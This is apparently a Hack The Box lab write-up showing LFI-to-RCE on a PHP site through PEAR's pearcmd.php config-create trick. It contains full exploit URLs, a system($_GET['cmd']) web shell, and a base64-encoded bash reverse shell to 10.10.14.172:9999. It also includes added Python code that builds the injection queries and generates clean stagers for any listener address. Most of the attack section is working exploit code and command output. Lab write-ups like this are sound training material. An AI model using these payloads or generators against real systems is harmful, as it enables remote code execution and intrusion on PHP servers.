CVE-2022-47945
The target web application appears to be exploitable with the same pearcmd.php trick used in the public CVE-2022-47945 exploits (that CVE is a ThinkPHP LFI; the file-write primitive behind its PoCs is generic and is what applies here).
Leveraging the LFI in the page parameter, it is possible to achieve RCE: the official php Docker image ships PEAR at /usr/local/lib/php/pearcmd.php, and when register_argc_argv is on, PHP splits the raw query string on + into $argv. Including pearcmd.php therefore runs PEAR's config-create command with attacker-chosen arguments, and config-create writes a config file, with the supplied root path (here a PHP tag) embedded in every serialized entry, to any location www-data can write.
/?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?phpinfo();?>+/var/www/itrc/phpinfo.php
The & after pearcmd terminates the page value, so $_GET['page'] stays a clean traversal path (the include appends .php, which is why page=phpinfo later loads phpinfo.php), while the +-separated tokens after it become pearcmd's argv. The preconditions are all visible in the phpinfo() output below: register_argc_argv is On (the image ships no php.ini, so PHP's built-in default applies), short_open_tag is On (the <? tag is what makes <?phpinfo();?> parse as code), PHP was built --with-pear, and the document root is owned by www-data.
Switching the page parameter to the file just written, page=phpinfo, executes it:
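To make the placement of the & and + characters concrete, here is an added model of the two PHP-side parsing steps and of the file config-create writes. This is example code, not the page's or PEAR's own; it assumes that register_argc_argv splits the raw query string on + with strtok semantics and no URL-decoding, that pearcmd.php discards $argv[0] as the script name, and that the directory suffixes and key order are those visible in the serialized config the page shows being executed.

```python
"""Model of the pearcmd.php argument-injection primitive used on this page.

Added example, not code from the page or from PEAR. It re-implements the
two PHP-side parsing steps that make the payload work and reproduces the
file that `pear config-create` writes, as inferred from the serialized
config the page shows being executed. Assumptions: with register_argc_argv
on, PHP splits the raw query string on '+' into $argv (strtok semantics,
no URL-decoding), and pearcmd.php discards $argv[0] as the script name.
"""
from urllib.parse import unquote_plus

TRAVERSAL = "../../../../../../../../usr/local/lib/php/pearcmd"

# Suffixes config-create appends to the root path, in the order the page's
# output lists them; the root is where the PHP tag gets injected.
PEAR_DIRS = [
    ("php_dir", "/pear/php"), ("data_dir", "/pear/data"),
    ("www_dir", "/pear/www"), ("cfg_dir", "/pear/cfg"),
    ("ext_dir", "/pear/ext"), ("doc_dir", "/pear/docs"),
    ("test_dir", "/pear/tests"), ("cache_dir", "/pear/cache"),
    ("download_dir", "/pear/download"), ("temp_dir", "/pear/temp"),
    ("bin_dir", "/pear"), ("man_dir", "/pear/man"),
]


def build_query(php_code, out_path, traversal=TRAVERSAL):
    """page=<traversal>&+config-create+/&/<php_code>+<out_path>.

    '&' terminates the page value so the include path stays clean; '+' is
    the only argv separator, so the code and path must not contain it (or
    whitespace, which would have to be sent as '+')."""
    for bad in ("+", " ", "\t", "\n"):
        if bad in php_code or bad in out_path:
            raise ValueError(f"{bad!r} would split or corrupt argv; encode it")
    return f"page={traversal}&+config-create+/&/{php_code}+{out_path}"


def php_argv(query_string):
    """$argv as register_argc_argv builds it: raw query split on '+'."""
    return [tok for tok in query_string.split("+") if tok]


def php_get(query_string):
    """$_GET as the application sees it: split on '&', then '=', then decode."""
    params = {}
    for pair in query_string.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params[unquote_plus(key)] = unquote_plus(value)
    return params


def pearcmd_args(query_string):
    """pearcmd drops $argv[0] (the 'script name'); the rest is its command line."""
    return php_argv(query_string)[1:]


def php_serialize(value):
    """Minimal PHP serialize() for the str and array shapes the config uses."""
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
    return f"a:{len(value)}:{{{body}}}"


def pear_config_create(root):
    """Contents of the file `pear config-create <root> <file>` writes: a
    comment line plus a serialized array whose paths all start with root."""
    config = {name: root + suffix for name, suffix in PEAR_DIRS}
    config["__channels"] = {"pecl.php.net": {}, "__uri": {}}
    return "#PEAR_Config 0.9\n" + php_serialize(config)


def simulate(query_string):
    """(file the app includes, file pearcmd writes, that file's contents)."""
    page = php_get(query_string)["page"]
    command, root, out_path = pearcmd_args(query_string)
    if command != "config-create":
        raise ValueError(f"pearcmd would run {command!r}, not config-create")
    return page + ".php", out_path, pear_config_create(root)
```

Running simulate() on the phpinfo query reproduces the s:26:"/&/<?phpinfo();?>/pear/php" entry that the page's response begins with, and the web shell variant yields the s:37 entries seen later; the string lengths match because PEAR serializes the root verbatim, which is exactly why the injected tag survives into the written file.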
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -i http://itrc.ssg.htb/index.php?page=phpinfo | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 39400 0 39400 0 0 480k 0 --:--:-- --:--:-- --:--:-- 487k
curl: (18) transfer closed with outstanding read data remaining
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 04 Aug 2024 11:42:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.1.29
Set-Cookie: PHPSESSID=b0b3d7759bae7e0eb7924bc5bc91e9b4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
****** SSG IT Resource Center ******
Register Login
#PEAR_Config 0.9 a:12:{s:7:"php_dir";s:26:"/&/
[PHP logo]
****** PHP Version 8.1.29 ******
Linux itrc 5.15.0-117-generic #127-
System Ubuntu SMP Fri Jul 5 20:13:28 UTC 2024
x86_64
Build Date Jul 23 2024 09:10:25
Build System Linux - Docker
Build Provider https://github.com/docker-library/php
Configure Command './configure' '--build=x86_64-linux-gnu' '--with-config-file-path=/usr/local/etc/php' '--with-config-file-scan-dir=/usr/local/etc/php/conf.d' '--enable-option-checking=fatal' '--with-mhash' '--with-pic' '--enable-ftp' '--enable-mbstring' '--enable-mysqlnd' '--with-password-argon2' '--with-sodium=shared' '--with-pdo-sqlite=/usr' '--with-sqlite3=/usr' '--with-curl' '--with-iconv' '--with-openssl' '--with-readline' '--with-zlib' '--disable-phpdbg' '--with-pear' '--with-libdir=lib/x86_64-linux-gnu' '--disable-cgi' '--with-apxs2' 'build_alias=x86_64-linux-gnu'
Server API Apache 2.0 Handler
Virtual Directory Support disabled
Configuration File (php.ini) Path /usr/local/etc/php
Loaded Configuration File (none)
Scan this dir for additional .ini files /usr/local/etc/php/conf.d
Additional .ini files parsed /usr/local/etc/php/conf.d/docker-php-ext-pdo_mysql.ini, /usr/local/etc/php/conf.d/docker-php-ext-sodium.ini, /usr/local/etc/php/conf.d/docker-php-ext-zip.ini, /usr/local/etc/php/conf.d/sessions.ini
PHP API 20210902
PHP Extension 20210902
Zend Extension 420210902
Zend Extension Build API420210902,NTS
PHP Extension Build API20210902,NTS
Debug Build no
Thread Safety disabled
Zend Signal Handling enabled
Zend Memory Manager enabled
Zend Multibyte Support provided by mbstring
Zend Max Execution Timers disabled
IPv6 Support enabled
DTrace Support disabled
Registered PHP Streams https, ftps, compress.zlib, php, file,
glob, data, http, ftp, phar, zip
Registered Stream Socket Transports tcp, udp, unix, udg, ssl, tls, tlsv1.0,
tlsv1.1, tlsv1.2, tlsv1.3
Registered Stream Filters zlib.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, convert.*, consumed, dechunk
[Zend logo]This program makes use of the Zend Scripting Language Engine:
Zend Engine v4.1.29, Copyright (c) Zend Technologies
===============================================================================
****** Configuration ******
***** apache2handler *****
Apache Version Apache/2.4.61 (Debian)
Apache API Version 20120211
Server Administrator [no address given]
Hostname:Port itrc.ssg.htb:0
User/Group www-data(33)/33
Max Requests Per Child: 0 - Keep Alive: on - Max Per Connection: 100
Timeouts Connection: 300 - Keep-Alive: 5
Virtual Server Yes
Server Root /etc/apache2
Loaded Modules core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php mod_reqtimeout mod_rewrite mod_setenvif mod_status
Directive Local Value Master Value
engine On On
last_modified Off Off
xbithack Off Off
***** Apache Environment *****
Variable Value
HTTP_HOST itrc.ssg.htb
HTTP_CONNECTION close
HTTP_USER_AGENT curl/8.5.0
HTTP_ACCEPT */*
PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
SERVER_SIGNATURE <address>Apache/2.4.61 (Debian) Server at itrc.ssg.htb Port 80</address>
SERVER_SOFTWARE Apache/2.4.61 (Debian)
SERVER_NAME itrc.ssg.htb
SERVER_ADDR 172.223.0.3
SERVER_PORT 80
REMOTE_ADDR 172.223.0.1
DOCUMENT_ROOT /var/www/itrc
REQUEST_SCHEME http
CONTEXT_PREFIX no value
CONTEXT_DOCUMENT_ROOT /var/www/itrc
SERVER_ADMIN [no address given]
SCRIPT_FILENAME /var/www/itrc/index.php
REMOTE_PORT 34710
GATEWAY_INTERFACE CGI/1.1
SERVER_PROTOCOL HTTP/1.0
REQUEST_METHOD GET
QUERY_STRING page=phpinfo
REQUEST_URI /index.php?page=phpinfo
SCRIPT_NAME /index.php
***** HTTP Headers Information *****
HTTP Request Headers
HTTP Request GET /index.php?page=phpinfo HTTP/1.0
Host itrc.ssg.htb
Connection close
User-Agent curl/8.5.0
Accept */*
HTTP Response Headers
X-Powered-By PHP/8.1.29
Set-Cookie PHPSESSID=b0b3d7759bae7e0eb7924bc5bc91e9b4; path=/
Expires Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control no-store, no-cache, must-revalidate
Pragma no-cache
***** Core *****
PHP Version 8.1.29
Directive Local Value Master Value
allow_url_fopen On On
allow_url_include Off Off
arg_separator.input & &
arg_separator.output & &
auto_append_file no value no value
auto_globals_jit On On
auto_prepend_file no value no value
browscap no value no value
default_charset UTF-8 UTF-8
default_mimetype text/html text/html
disable_classes no value no value
disable_functions no value no value
display_errors On On
display_startup_errors On On
doc_root no value no value
docref_ext no value no value
docref_root no value no value
enable_dl On On
enable_post_data_reading On On
error_append_string no value no value
error_log no value no value
error_prepend_string no value no value
error_reporting no value no value
expose_php On On
extension_dir /usr/local/lib/php/extensions/no-debug-non-zts-20210902 /usr/local/lib/php/extensions/no-debug-non-zts-20210902
fiber.stack_size no value no value
file_uploads On On
hard_timeout 2 2
highlight.comment #FF8000 #FF8000
highlight.default #0000BB #0000BB
highlight.html #000000 #000000
highlight.keyword #007700 #007700
highlight.string #DD0000 #DD0000
html_errors On On
ignore_repeated_errors Off Off
ignore_repeated_source Off Off
ignore_user_abort Off Off
implicit_flush Off Off
include_path .:/usr/local/lib/php .:/usr/local/lib/php
input_encoding no value no value
internal_encoding no value no value
log_errors Off Off
mail.add_x_header Off Off
mail.force_extra_parameters no value no value
mail.log no value no value
max_execution_time 30 30
max_file_uploads 20 20
max_input_nesting_level 64 64
max_input_time -1 -1
max_input_vars 1000 1000
max_multipart_body_parts -1 -1
memory_limit 128M 128M
open_basedir no value no value
output_buffering 0 0
output_encoding no value no value
output_handler no value no value
post_max_size 8M 8M
precision 14 14
realpath_cache_size 4096K 4096K
realpath_cache_ttl 120 120
register_argc_argv On On
report_memleaks On On
report_zend_debug Off Off
request_order no value no value
sendmail_from no value no value
sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i
serialize_precision -1 -1
short_open_tag On On
SMTP localhost localhost
smtp_port 25 25
sys_temp_dir no value no value
syslog.facility LOG_USER LOG_USER
syslog.filter no-ctrl no-ctrl
syslog.ident php php
unserialize_callback_func no value no value
upload_max_filesize 2M 2M
upload_tmp_dir no value no value
user_dir no value no value
user_ini.cache_ttl 300 300
user_ini.filename .user.ini .user.ini
variables_order EGPCS EGPCS
xmlrpc_error_number 0 0
xmlrpc_errors Off Off
zend.assertions 1 1
zend.detect_unicode On On
zend.enable_gc On On
zend.exception_ignore_args Off Off
zend.exception_string_param_max_len 15 15
zend.multibyte Off Off
zend.script_encoding no value no value
zend.signal_check Off Off
***** ctype *****
ctype functions enabled
***** curl *****
cURL support enabled
cURL Information 7.88.1
Age 10
Features
AsynchDNS Yes
CharConv No
Debug No
GSS-Negotiate No
IDN Yes
IPv6 Yes
krb4 No
Largefile Yes
libz Yes
NTLM Yes
NTLMWB Yes
SPNEGO Yes
SSL Yes
SSPI No
TLS-SRP Yes
HTTP2 Yes
GSSAPI Yes
KERBEROS5 Yes
UNIX_SOCKETS Yes
PSL Yes
HTTPS_PROXY Yes
MULTI_SSL No
BROTLI Yes
Protocols dict, file, ftp, ftps, gopher, gophers, http, https, imap, imaps, ldap, ldaps, mqtt, pop3, pop3s, rtmp, rtmpe, rtmps, rtmpt, rtmpte, rtmpts, rtsp, scp, sftp, smb, smbs, smtp, smtps, telnet, tftp
Host x86_64-pc-linux-gnu
SSL Version OpenSSL/3.0.13
ZLib Version 1.2.13
libSSH Version libssh2/1.10.0
Directive Local Value Master Value
curl.cainfo no value no value
***** date *****
date/time support enabled
timelib version 2021.19
"Olson" Timezone Database Version 2023.3
Timezone Database internal
Default timezone UTC
Directive Local Value Master Value
date.default_latitude 31.7667 31.7667
date.default_longitude 35.2333 35.2333
date.sunrise_zenith 90.833333 90.833333
date.sunset_zenith 90.833333 90.833333
date.timezone no value no value
***** dom *****
DOM/XML enabled
DOM/XML API Version 20031129
libxml Version 2.9.14
HTML Support enabled
XPath Support enabled
XPointer Support enabled
Schema Support enabled
RelaxNG Support enabled
***** fileinfo *****
fileinfo support enabled
libmagic 540
***** filter *****
Input Validation and Filtering enabled
Directive Local Value Master Value
filter.default unsafe_raw unsafe_raw
filter.default_flags no value no value
***** ftp *****
FTP support enabled
FTPS support enabled
***** hash *****
hash support enabled
Hashing Engines md2 md4 md5 sha1 sha224 sha256 sha384 sha512/224 sha512/256 sha512 sha3-224 sha3-256 sha3-384 sha3-512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b crc32c fnv132 fnv1a32 fnv164 fnv1a64 joaat murmur3a murmur3c murmur3f xxh32 xxh64 xxh3 xxh128 haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5
MHASH support Enabled
MHASH API Version Emulated Support
***** iconv *****
iconv support enabled
iconv implementation glibc
iconv library version 2.36
Directive Local Value Master Value
iconv.input_encoding no value no value
iconv.internal_encoding no value no value
iconv.output_encoding no value no value
***** json *****
json support enabled
***** libxml *****
libXML support active
libXML Compiled Version 2.9.14
libXML Loaded Version 20914
libXML streams enabled
***** mbstring *****
Multibyte Support
The response renders the phpinfo() output inside the PEAR config text: config-create wrote /var/www/itrc/phpinfo.php with the injected tag in every serialized path, and including that file executed the tag.
Webshell
/index.php?page=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?system($_GET['cmd']);?>+/var/www/itrc/webshell.php
Now I will write a PHP webshell to /var/www/itrc/webshell.php with the same primitive; <?system($_GET['cmd']);?> again relies on the short open tag and runs whatever the cmd parameter of the next request carries.
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=webshell&cmd=id' | html2text
****** SSG IT Resource Center ******
Register Login
#PEAR_Config 0.9 a:13:{s:7:"php_dir";s:37:"/&/uid=33(www-data) gid=33(www-data)
groups=33(www-data) /pear/php";s:8:"data_dir";s:38:"/&/uid=33(www-data) gid=33
(www-data) groups=33(www-data) /pear/data";s:7:"www_dir";s:37:"/&/uid=33(www-
data) gid=33(www-data) groups=33(www-data) /pear/www";s:7:"cfg_dir";s:37:"/&/
uid=33(www-data) gid=33(www-data) groups=33(www-data) /pear/cfg";s:7:
"ext_dir";s:37:"/&/uid=33(www-data) gid=33(www-data) groups=33(www-data) /pear/
ext";s:7:"doc_dir";s:38:"/&/uid=33(www-data) gid=33(www-data) groups=33(www-
data) /pear/docs";s:8:"test_dir";s:39:"/&/uid=33(www-data) gid=33(www-data)
groups=33(www-data) /pear/tests";s:9:"cache_dir";s:39:"/&/uid=33(www-data)
gid=33(www-data) groups=33(www-data) /pear/cache";s:12:"download_dir";s:42:"/&/
uid=33(www-data) gid=33(www-data) groups=33(www-data) /pear/download";s:8:
"temp_dir";s:38:"/&/uid=33(www-data) gid=33(www-data) groups=33(www-data) /
pear/temp";s:7:"bin_dir";s:33:"/&/uid=33(www-data) gid=33(www-data) groups=33
(www-data) /pear";s:7:"man_dir";s:37:"/&/uid=33(www-data) gid=33(www-data)
groups=33(www-data) /pear/man";s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:
{}s:5:"__uri";a:0:{}}}
© 2024 Strategic Solutions Group (SSG) | All rights reserved
RCE confirmed: the id output appears in every PEAR config path because the web shell executes at each point where the injected root string was serialized.
Reverse Shell
../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?system(base64_decode("L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzk5OTkgMD4mMScK"));?>+/var/www/itrc/shell.php
Writing a base64-encoded reverse shell payload into /var/www/itrc/shell.php. The encoded string decodes to /bin/bash -c 'bash -i > /dev/tcp/10.10.14.172/9999 0>&1'; at request time PHP's native base64_decode() recovers it and system() executes it.
Base64 is needed because the raw command contains spaces, and the only way to put a space in the query string is +, which register_argc_argv treats as the argv separator. Check the encoded string itself for + before sending it: standard base64 can emit that character, and one inside the stager would be split into an extra argument, corrupting both the PHP code and the output path.
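The following added example builds that stager and applies the + check described above; it is not the page's own tooling. It assumes, from the payload shown, that the written file has the form <?system(base64_decode("<b64>"));?>, that register_argc_argv splits the raw query string on +, and that pearcmd takes the two tokens after config-create as root and file. When an encoding contains +, the encoder pads the command with trailing spaces, which the shell ignores, until the encoding is clean.

```python
"""Base64 stager for the reverse-shell write shown above. Added example,
not the page's own tooling. Assumed from the payload on this page: the
written file is <?system(base64_decode("<b64>"));?>, register_argc_argv
splits the raw query string on '+', and pearcmd takes the tokens after
config-create as <root> and <file>. Standard base64 uses '+' in its
alphabet, so an encoding that happens to contain one would be split into
an extra argument; the encoder below pads the command with trailing
spaces (which the shell ignores) until the encoding is '+'-free.
"""
import base64

TRAVERSAL = "../../../../../../../../usr/local/lib/php/pearcmd"

# The encoded string taken verbatim from the payload above.
PAGE_B64 = "L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4gL2Rldi90Y3AvMTAuMTAuMTQuMTcyLzk5OTkgMD4mMScK"


def reverse_shell_cmd(lhost, lport):
    """bash reverse shell; the trailing newline matches the page's payload."""
    return f"/bin/bash -c 'bash -i > /dev/tcp/{lhost}/{lport} 0>&1'\n"


def b64_for_pearcmd(cmd, max_pad=32):
    """Encode cmd so the result contains no '+'; '/' and '=' are harmless here."""
    for pad in range(max_pad):
        encoded = base64.b64encode((cmd + " " * pad).encode()).decode()
        if "+" not in encoded:
            return encoded
    raise ValueError("no '+'-free encoding found; change the command instead")


def stager_php(encoded):
    """Short-tag PHP (short_open_tag is On on the target) that runs the command."""
    return f'<?system(base64_decode("{encoded}"));?>'


def build_shell_query(lhost, lport, out_path, traversal=TRAVERSAL):
    """Full query string for the pearcmd config-create write of the stager."""
    code = stager_php(b64_for_pearcmd(reverse_shell_cmd(lhost, lport)))
    return f"page={traversal}&+config-create+/&/{code}+{out_path}"


def decode_stager(encoded):
    """What base64_decode() hands to system() on the target."""
    return base64.b64decode(encoded).decode()
```

For the listener 10.10.14.172:9999 the first encoding is already free of +, so build_shell_query() reproduces the page's payload exactly; for other commands the padding loop is what keeps the write from silently landing in the wrong file.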
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=webshell&cmd=ls+-la'
[...REDACTED...]
a:13:{s:7:"php_dir";s:37:"/&/total 120
drwxr-xr-x 1 www-data www-data 4096 Aug 4 12:30 .
drwxr-xr-x 1 www-data www-data 4096 Jul 25 11:28 ..
-rw-rw-r-- 1 www-data www-data 4313 Jan 24 2024 admin.php
drwxrwxr-x 1 www-data www-data 4096 Feb 26 23:18 api
drwxrwxr-x 1 www-data www-data 4096 Jan 22 2024 assets
-rw-rw-r-- 1 www-data www-data 979 Jan 23 2024 create_ticket.php
-rw-rw-r-- 1 www-data www-data 344 Jan 24 2024 dashboard.php
-rw-rw-r-- 1 www-data www-data 308 Jan 22 2024 db.php
-rw-rw-r-- 1 www-data www-data 746 Jan 24 2024 filter.inc.php
-rw-rw-r-- 1 www-data www-data 982 Jan 24 2024 footer.inc.php
-rw-rw-r-- 1 www-data www-data 1869 Jan 24 2024 header.inc.php
-rw-rw-r-- 1 www-data www-data 844 Jan 22 2024 home.php
-rw-rw-r-- 1 www-data www-data 368 Feb 19 18:14 index.php
-rw-rw-r-- 1 www-data www-data 105 Feb 19 18:14 loggedin.php
-rw-rw-r-- 1 www-data www-data 433 Jan 23 2024 login.php
-rw-rw-r-- 1 www-data www-data 73 Jan 22 2024 logout.php
-rw-r--r-- 1 www-data www-data 619 Aug 4 12:14 phpinfo.php
-rw-rw-r-- 1 www-data www-data 566 Jan 23 2024 register.php
-rw-rw-r-- 1 www-data www-data 2225 Feb 6 16:54 savefile.inc.php
-rw-r--r-- 1 www-data www-data 1735 Aug 4 12:30 shell.php
-rw-rw-r-- 1 www-data www-data 4968 Feb 6 17:09 ticket.php
-rw-rw-r-- 1 www-data www-data 1374 Jan 24 2024 ticket_section.inc.php
drwxrwxr-x 1 www-data www-data 4096 Aug 4 12:26 uploads
-rw-r--r-- 1 www-data www-data 819 Aug 4 12:16 webshell.php
I can confirm the file write: shell.php (1735 bytes), webshell.php and phpinfo.php now sit in /var/www/itrc next to the application's own files, all owned by www-data.
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ curl -s 'http://itrc.ssg.htb/index.php?page=shell'
Requesting page=shell includes /var/www/itrc/shell.php through the same LFI and fires the reverse shell; the curl call blocks for as long as the shell stays connected, since system() waits for its child.
┌──(kali㉿kali)-[~/archive/htb/labs/resource]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.172] from (UNKNOWN) [10.10.11.27] 40546
whoami
www-data
hostname
itrc
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.223.0.3 netmask 255.255.0.0 broadcast 172.223.255.255
ether 02:42:ac:df:00:03 txqueuelen 0 (Ethernet)
RX packets 2720637 bytes 250690719 (239.0 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2218411 bytes 393711959 (375.4 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 17298 bytes 1953929 (1.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17298 bytes 1953929 (1.8 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Initial foothold established in the target environment as the www-data account on itrc.
It appears to be a Docker container rather than the host: the eth0 MAC 02:42:ac:df:00:03 carries Docker's 02:42 prefix with the 172.223.0.3 address encoded in it, 172.223.0.0/16 is a bridge network, phpinfo() reported Build System "Linux - Docker" and docker-php-ext-*.ini files, the userland is Debian (Apache/2.4.61 (Debian)) while the kernel is Ubuntu's 5.15.0-117-generic, and the nginx/1.18.0 (Ubuntu) Server header on the first response shows an Ubuntu host proxying into it.